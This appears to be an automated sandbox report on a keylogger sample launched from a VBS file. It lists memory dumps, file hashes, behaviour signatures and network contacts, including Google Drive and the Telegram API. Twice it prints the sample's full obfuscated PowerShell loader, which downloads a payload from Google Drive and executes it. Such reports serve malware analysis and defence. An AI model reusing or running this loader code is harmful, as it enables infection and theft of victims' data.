memory/4100-20-0x00007FFBD1880000-0x00007FFBD2341000-memory.dmp
memory/1032-21-0x0000000002EC0000-0x0000000002EF6000-memory.dmp
memory/1032-22-0x0000000005BA0000-0x00000000061C8000-memory.dmp
memory/1032-23-0x0000000005930000-0x0000000005952000-memory.dmp
memory/1032-24-0x00000000059D0000-0x0000000005A36000-memory.dmp
memory/1032-25-0x00000000061D0000-0x0000000006236000-memory.dmp
memory/1032-31-0x0000000006240000-0x0000000006594000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d336b18e0e02e045650ac4f24c7ecaa7 |
| SHA1 | 87ce962bb3aa89fc06d5eb54f1a225ae76225b1c |
| SHA256 | 87e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27 |
| SHA512 | e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18 |
memory/1032-37-0x00000000067E0000-0x00000000067FE000-memory.dmp
memory/1032-38-0x0000000006810000-0x000000000685C000-memory.dmp
memory/1032-39-0x0000000008040000-0x00000000086BA000-memory.dmp
memory/1032-40-0x0000000006D50000-0x0000000006D6A000-memory.dmp
memory/1032-41-0x0000000007A60000-0x0000000007AF6000-memory.dmp
memory/1032-42-0x00000000079F0000-0x0000000007A12000-memory.dmp
memory/1032-43-0x0000000008C70000-0x0000000009214000-memory.dmp
C:\Users\Admin\AppData\Roaming\Bindehindens.Stu
| MD5 | d43327229caac3f1c1c7443675eaa345 |
| SHA1 | 169d456a6122e6a39603f3017eb16df162aca251 |
| SHA256 | 0144e44b033690c4d3387d5125a5a76003d371ca48116a53d1439f83d6b530d3 |
| SHA512 | da4cdb914c5618ca83f4f97bf28d89899bc9459ff797b6f865488a7f446b56cea77bbe37aeb2e89fb81937b6fa1929a2e6c9feca5fa2ee32344f21e0dff3a10d |
memory/1032-45-0x0000000009220000-0x000000000E52E000-memory.dmp
memory/4656-58-0x0000000000800000-0x0000000001A54000-memory.dmp
memory/4656-59-0x0000000000800000-0x0000000001A54000-memory.dmp
memory/4656-60-0x0000000000800000-0x0000000000848000-memory.dmp
memory/4656-61-0x0000000024BC0000-0x0000000024C5C000-memory.dmp
memory/4656-62-0x0000000025840000-0x0000000025A02000-memory.dmp
memory/4656-63-0x0000000025670000-0x00000000256C0000-memory.dmp
memory/4656-65-0x0000000025770000-0x0000000025802000-memory.dmp
memory/4656-66-0x0000000025720000-0x000000002572A000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-23 15:03
Reported
2024-10-23 15:06
Platform
win7-20240708-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
VIPKeylogger
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DistribucionesEnelcaJanS.L.PEDIDO456799.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUds.oEPr abcU thru Bevgr rofeiDouseTNona YKi owphaderraktivoSync.tFletnOPaas,CWasheo NedslMask TGon.oy etalpLymphe Syda]Liss.:Feign:IndokT.espulAnormsInezs1 ygge2Lbeti ');$Discanonize=$Achenial[0];$Acetylenyl=(Roosting ' ibec$ DbefGjungels bcoOBogstbEj kua Som.lBagat: YurukP teno MeniM OnomFDebeauBrancrReec sGrund= ExhaNCampaeKra.tWW gge-RdbyeoPaakrbParagjElskoEOrdreC L ftTForsv DispasWerebyPreciSHen yTKleviELasermGente.BetakN panteBeskft ngag.BlackW Fod,EOdd rb Besoc aillMyzosi ernaeVokalNDemontGanoi ');Outsprint ($Acetylenyl);Outsprint (Roosting ' Rem $ diplKUnderoEl.ktmIndkvfSo icuBenz rDvalesDgnin.OfterHChoroeAgerhastratd ownce ortrrTed ysCreti[Acari$YnettSPerjukHellii To,lbi,adjsho ospS astrKlyn oRedrevanusvi Dispa Un gnuddatt Udfoe VarirSplidiPengenSk bigSu.faeLocutnDrilssDr,vk]Tran.=Sansc$PudsyLSkyndaP otomEverteSpiro ');$Delprojekts=Roosting 'Folke$ GeneKPr.rio aguemOutf.fUnprou rderEnkels Hell.HummoDInferoleprowclarinAb,kalHomemoSatsbaFortndDist FOptimi Sol lDarede Octa( Prim$ NewsD agsli BasisGnistcKpuesaSolavn UnreoStyrkn odeliTrueiz ricoeMotio, C ys$ HamaNEgoc eOplukdjacqurFlyttiImplegUnsuis,hosptWrot ) Koge ';$Nedrigst=$Bagmandens;Outsprint (Roosting ' Syva$syntoG Ch cLinfitOB,okbBEntalAH,mouL Penn:TelauFFlinto Bevarfor at Tranh PresBGr ndR PhytISarg nJinklGSupereMesiaR,apfo= inje(Expe.tFo stEMiljkS SolltDykni-ForspPInvalafilteT DamkHMi,rg Mis.r$fejekn.icote Ndsid,underExpilIUncligNyde S rotetFlamb)Overb ');while (!$Forthbringer) {Outsprint (Roosting 'isaia$Homogg AarslBeornoMinu.bCosm a resslAfsta:cel,iRtinsehTuteliVrdi zGastromatrosBe,titVer.fo,lsnemKarr oS atiuFljtesIdre =Foreb$Sa elt rocer Que,umnbodeFlans ') ;Outsprint $Delprojekts;Outsprint (Roosting ' ProgS SyltTOpsp aS cerr SpndTBeslu-Exumbs luel UnfeeS tteE BldgpJudok Admi4Bille ');Outsprint (Roosting 'Portm$damokgscho.LFrf eOLogotBfors AFulmiL M ol:Lipa FHydroOSuperR olctUngdoHUncomBDe amrDisafIOvercnSvi.gG BallEF rmerSewer=Skaer( CounT FiduESkabiSYoke.TRo en-AcetoPAnc.raFuelotstridH Skep ,sko$ orenN Ra,seVoltidOpgivRPoloniGarvngPropisAerogtFeat,) Saan ') ;Outsprint (Roosting 'Pr,va$ orpugShortLStimuo EnkebUnconaolympLEmbas:F ernaNontaVslingaJadeiN Dro TSubmiGFor rA GausrUdstndUntotE Ek kSHisto=Proba$ De ag empelUndisoUdflyBPlbroAAdamiLSacch:TroweFUnsacLFunktEchi otGangatHomopE Pr ddI aksETimel+Trans+Eubac%Modfo$Ful fAStorkc Tem.hHemate,kuffNEtymoi UdbrAPenseLSki e.For fCinfluODieseUHe reNDinottVoldt ') ;$Discanonize=$Achenial[$Avantgardes];}$Levisticum=324089;$Paragraffer=32274;Outsprint (Roosting ' Beau$Sp oggSerfalUngarokal aBMenaca MaholGalea:ErhveL DjrvOLegatpBonifHVe.stI DelaOAlcohsSchattBk.enOStrafM EkseoS.msou SpagsGappe Uspor= carr FirspGa tagec gnatSlide-SendeCJur so snitn IldsTBesvrETrepanPrizeTNonin Vejr$ FleunnebeneUdvikdclav.r AssoiA,klagEneboSNemdrTIli c ');Outsprint (Roosting 'Clois$,orgegRaffilG,erno ekurbmaal aP ognlYarm.:AlichSReas aSkuddb D rslSynsfeNonserindkr Rus.h=,raab nful[Skr lSHardtyRundssMarg tC.rraeTo.rimskrab.H olaC Ar loEdgi nL.konvOdsteeCor mr ccortMjsom]her,d:Umb l:TenonF.rster Vin.o misdm vausBDi wiaAmba sOpseneGu tu6Kvidd4MontmSFla.kt S olr gteriUnendnKlikeg Hy e( Ferm$WhereLHydroo Udlsp attehTole iTokr oGe,ets F netMethioVedanmErobro SipuuEyeb sD,nin)Ligeg ');Outsprint (Roosting 'Raspi$ Blamg lmenl AtteoFormyB seudaBehanlChurc: FrasK CircOCo.ieLDoor,EOxycyRCystoaGsene S.ere= orb For.i[ iscSCont yL.rersBandgt.rentEAllerMSober.,yfust ForueGrinnxT torTTempo. La dEAnagenSlingCdogmaOBlo,sDDvuthIwaddlNProjeG Park]Kollo: De o:Cyc oa ArtisFlyveCTerepiD eniiCapac.drbesGLineoePulvetPenthssp,ttTHel,rRS.mneiRopelN SurdgCamer( grah$Ho.piS SammADecomb.nterlForsveCulderCy,no)Multi ');Outsprint (Roosting 'Th rs$S,mtsgmisthLValouo.konfBConduaBifaglDears:SamoadBanneO UdstmTe efkPseudaRigg PSolacE alkaLlnd.lLOcculeOpmagrR gmasPro,c= Proj$CriniKDichro pyroLPrfabE ForbrGeomeAMise .Hullos,rugeu oogeBMicroSTaaretOpganR S adirumfaNCont g Reso(,resb$Rum alHin ueTu uivPromiiK.ndeSAburtt ZeroIPtychC Tr vUSantamIndiv,Super$RegalpCitriaUltraR KeraA ackwgVivisR Til.a .ikvf Scumf BurgEShoplrBur e)T mot ');Outsprint $Domkapellers;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUds.oEPr abcU thru Bevgr rofeiDouseTNona YKi owphaderraktivoSync.tFletnOPaas,CWasheo NedslMask TGon.oy etalpLymphe Syda]Liss.:Feign:IndokT.espulAnormsInezs1 ygge2Lbeti ');$Discanonize=$Achenial[0];$Acetylenyl=(Roosting ' ibec$ DbefGjungels bcoOBogstbEj kua Som.lBagat: YurukP teno MeniM OnomFDebeauBrancrReec sGrund= ExhaNCampaeKra.tWW gge-RdbyeoPaakrbParagjElskoEOrdreC L ftTForsv DispasWerebyPreciSHen yTKleviELasermGente.BetakN panteBeskft ngag.BlackW Fod,EOdd rb Besoc aillMyzosi ernaeVokalNDemontGanoi ');Outsprint ($Acetylenyl);Outsprint (Roosting ' Rem $ diplKUnderoEl.ktmIndkvfSo icuBenz rDvalesDgnin.OfterHChoroeAgerhastratd ownce ortrrTed ysCreti[Acari$YnettSPerjukHellii To,lbi,adjsho ospS astrKlyn oRedrevanusvi Dispa Un gnuddatt Udfoe VarirSplidiPengenSk bigSu.faeLocutnDrilssDr,vk]Tran.=Sansc$PudsyLSkyndaP otomEverteSpiro ');$Delprojekts=Roosting 'Folke$ GeneKPr.rio aguemOutf.fUnprou rderEnkels Hell.HummoDInferoleprowclarinAb,kalHomemoSatsbaFortndDist FOptimi Sol lDarede Octa( Prim$ NewsD agsli BasisGnistcKpuesaSolavn UnreoStyrkn odeliTrueiz ricoeMotio, C ys$ HamaNEgoc eOplukdjacqurFlyttiImplegUnsuis,hosptWrot ) Koge ';$Nedrigst=$Bagmandens;Outsprint (Roosting ' Syva$syntoG Ch cLinfitOB,okbBEntalAH,mouL Penn:TelauFFlinto Bevarfor at Tranh PresBGr ndR PhytISarg nJinklGSupereMesiaR,apfo= inje(Expe.tFo stEMiljkS SolltDykni-ForspPInvalafilteT DamkHMi,rg Mis.r$fejekn.icote Ndsid,underExpilIUncligNyde S rotetFlamb)Overb ');while (!$Forthbringer) {Outsprint (Roosting 'isaia$Homogg AarslBeornoMinu.bCosm a resslAfsta:cel,iRtinsehTuteliVrdi zGastromatrosBe,titVer.fo,lsnemKarr oS atiuFljtesIdre =Foreb$Sa elt rocer Que,umnbodeFlans ') ;Outsprint $Delprojekts;Outsprint (Roosting ' ProgS SyltTOpsp aS cerr SpndTBeslu-Exumbs luel UnfeeS tteE BldgpJudok Admi4Bille ');Outsprint (Roosting 'Portm$damokgscho.LFrf eOLogotBfors AFulmiL M ol:Lipa FHydroOSuperR olctUngdoHUncomBDe amrDisafIOvercnSvi.gG BallEF rmerSewer=Skaer( CounT FiduESkabiSYoke.TRo en-AcetoPAnc.raFuelotstridH Skep ,sko$ orenN Ra,seVoltidOpgivRPoloniGarvngPropisAerogtFeat,) Saan ') ;Outsprint (Roosting 'Pr,va$ orpugShortLStimuo EnkebUnconaolympLEmbas:F ernaNontaVslingaJadeiN Dro TSubmiGFor rA GausrUdstndUntotE Ek kSHisto=Proba$ De ag empelUndisoUdflyBPlbroAAdamiLSacch:TroweFUnsacLFunktEchi otGangatHomopE Pr ddI aksETimel+Trans+Eubac%Modfo$Ful fAStorkc Tem.hHemate,kuffNEtymoi UdbrAPenseLSki e.For fCinfluODieseUHe reNDinottVoldt ') ;$Discanonize=$Achenial[$Avantgardes];}$Levisticum=324089;$Paragraffer=32274;Outsprint (Roosting ' Beau$Sp oggSerfalUngarokal aBMenaca MaholGalea:ErhveL DjrvOLegatpBonifHVe.stI DelaOAlcohsSchattBk.enOStrafM EkseoS.msou SpagsGappe Uspor= carr FirspGa tagec gnatSlide-SendeCJur so snitn IldsTBesvrETrepanPrizeTNonin Vejr$ FleunnebeneUdvikdclav.r AssoiA,klagEneboSNemdrTIli c ');Outsprint (Roosting 'Clois$,orgegRaffilG,erno ekurbmaal aP ognlYarm.:AlichSReas aSkuddb D rslSynsfeNonserindkr Rus.h=,raab nful[Skr lSHardtyRundssMarg tC.rraeTo.rimskrab.H olaC Ar loEdgi nL.konvOdsteeCor mr ccortMjsom]her,d:Umb l:TenonF.rster Vin.o misdm vausBDi wiaAmba sOpseneGu tu6Kvidd4MontmSFla.kt S olr gteriUnendnKlikeg Hy e( Ferm$WhereLHydroo Udlsp attehTole iTokr oGe,ets F netMethioVedanmErobro SipuuEyeb sD,nin)Ligeg ');Outsprint (Roosting 'Raspi$ Blamg lmenl AtteoFormyB seudaBehanlChurc: FrasK CircOCo.ieLDoor,EOxycyRCystoaGsene S.ere= orb For.i[ iscSCont yL.rersBandgt.rentEAllerMSober.,yfust ForueGrinnxT torTTempo. La dEAnagenSlingCdogmaOBlo,sDDvuthIwaddlNProjeG Park]Kollo: De o:Cyc oa ArtisFlyveCTerepiD eniiCapac.drbesGLineoePulvetPenthssp,ttTHel,rRS.mneiRopelN SurdgCamer( grah$Ho.piS SammADecomb.nterlForsveCulderCy,no)Multi ');Outsprint (Roosting 'Th rs$S,mtsgmisthLValouo.konfBConduaBifaglDears:SamoadBanneO UdstmTe efkPseudaRigg PSolacE alkaLlnd.lLOcculeOpmagrR gmasPro,c= Proj$CriniKDichro pyroLPrfabE ForbrGeomeAMise .Hullos,rugeu oogeBMicroSTaaretOpganR S adirumfaNCont g Reso(,resb$Rum alHin ueTu uivPromiiK.ndeSAburtt ZeroIPtychC Tr vUSantamIndiv,Super$RegalpCitriaUltraR KeraA ackwgVivisR Til.a .ikvf Scumf BurgEShoplrBur e)T mot ');Outsprint $Domkapellers;"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.178.3:80 | o.pki.goog | tcp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| DE | 193.122.6.168:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 172.67.177.134:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.18.190.73:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 184.25.193.234:80 | www.microsoft.com | tcp |
Files
memory/2700-4-0x000007FEF60CE000-0x000007FEF60CF000-memory.dmp
memory/2700-5-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp
memory/2700-6-0x000000001B6F0000-0x000000001B9D2000-memory.dmp
memory/2700-7-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp
memory/2700-8-0x0000000001EE0000-0x0000000001EE8000-memory.dmp
memory/2700-9-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp
memory/2700-10-0x000007FEF60CE000-0x000007FEF60CF000-memory.dmp
memory/2700-11-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp
memory/2700-13-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp
memory/2700-15-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FVLL3ESHKXJFXX1D8EA1.temp
| MD5 | 2d065c66d5e9293f616b97f6f99d65a1 |
| SHA1 | 5e4ad8f229ce0742ec6cba772aacc4d34aab5f9c |
| SHA256 | 391782ac7dc0a2347fbe4a0c0c123a2a5763e44d8155125b46e4c59c56c9a68d |
| SHA512 | d96f7e1449e6d7ddb1877d36b1ea60f8a38153798728f7ca2c00e476fb95e4c0a73dda342a0e1cc793ff61f52ab0aea02bcba4d00ac0968e7bc238a4ab7e92f3 |
C:\Users\Admin\AppData\Roaming\Bindehindens.Stu
| MD5 | d43327229caac3f1c1c7443675eaa345 |
| SHA1 | 169d456a6122e6a39603f3017eb16df162aca251 |
| SHA256 | 0144e44b033690c4d3387d5125a5a76003d371ca48116a53d1439f83d6b530d3 |
| SHA512 | da4cdb914c5618ca83f4f97bf28d89899bc9459ff797b6f865488a7f446b56cea77bbe37aeb2e89fb81937b6fa1929a2e6c9feca5fa2ee32344f21e0dff3a10d |
memory/2072-19-0x0000000006750000-0x000000000BA5E000-memory.dmp
memory/2276-41-0x0000000000F30000-0x0000000001F92000-memory.dmp
memory/2276-42-0x0000000000F30000-0x0000000001F92000-memory.dmp
memory/2276-43-0x0000000000F30000-0x0000000000F78000-memory.dmp